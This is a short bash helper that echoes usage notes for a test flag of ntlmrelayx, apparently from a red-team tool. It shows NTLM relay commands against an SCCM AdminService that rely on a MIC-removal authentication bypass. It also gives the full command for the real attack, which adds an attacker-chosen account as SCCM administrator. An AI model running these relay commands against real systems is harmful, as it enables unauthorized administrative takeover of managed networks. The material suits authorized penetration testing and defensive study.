#!/bin/bash

# Test script for --test-adminservice flag
# This demonstrates testing AdminService authentication without performing the attack

echo "=== AdminService Authentication Test ==="
echo ""
echo "This script demonstrates the --test-adminservice flag which:"
echo "  1. Tests authentication against SCCM AdminService"
echo "  2. Does NOT perform the actual attack (no admin is added)"
echo "  3. Can be run repeatedly (doesn't skip after first success)"
echo "  4. Shows full HTTP response for debugging"
echo ""
echo "Usage examples:"
echo ""
echo "# Test HTTP -> HTTPS relay authentication (local auth bypass)"
echo "sudo python3 examples/ntlmrelayx.py -t https://sccm-sitesrv1 \\"
echo "  --adminservice --test-adminservice \\"
echo "  --remove-mic-partial --try-local"
echo ""
echo "# Add -debug for verbose output including:"
echo "#  - Full Type 3 token received from client"
echo "#  - HTTP request/response headers"
echo "#  - Response body"
echo "sudo python3 examples/ntlmrelayx.py -t https://sccm-sitesrv1 \\"
echo "  --adminservice --test-adminservice \\"
echo "  --remove-mic-partial --try-local -debug"
echo ""
echo "Expected output in test mode:"
echo "  - 200 OK = Authentication succeeded!"
echo "  - 401 Unauthorized = Authentication failed"
echo "  - 403 Forbidden = Auth succeeded but insufficient permissions"
echo "  - 500 Internal Error = Auth succeeded but malformed request"
echo ""
echo "To actually perform the attack (add admin), remove --test-adminservice:"
echo "sudo python3 examples/ntlmrelayx.py -t https://sccm-sitesrv1 \\"
echo "  --adminservice --logonname 'DOMAIN\\user' \\"
echo "  --displayname 'Pwned User' --objectsid 'S-1-5-21-...' \\"
echo "  --remove-mic-partial --try-local"
